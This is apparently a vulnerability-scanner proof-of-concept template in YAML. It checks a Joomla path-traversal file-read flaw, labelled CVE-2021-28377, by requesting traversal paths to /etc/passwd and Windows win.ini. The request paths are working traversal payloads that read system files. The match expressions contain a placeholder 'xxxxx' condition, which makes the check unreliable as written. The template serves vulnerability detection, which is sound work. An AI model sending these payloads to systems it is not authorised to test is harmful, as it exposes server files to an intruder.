name: poc-yaml-joomla-cve-2021-28377-fileread
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /index.php?f=../../../../../../../etc/passwd
expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body) && response.body_string.contains("xxxxx")
r1:
request:
cache: true
method: GET
path: /index.php?f=../../../../../../../Windows/win.ini
expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support") && response.body_string.contains("xxxxx")
expression: r0() || r1()
detail:
author: Chaitin
links:
- http://example.com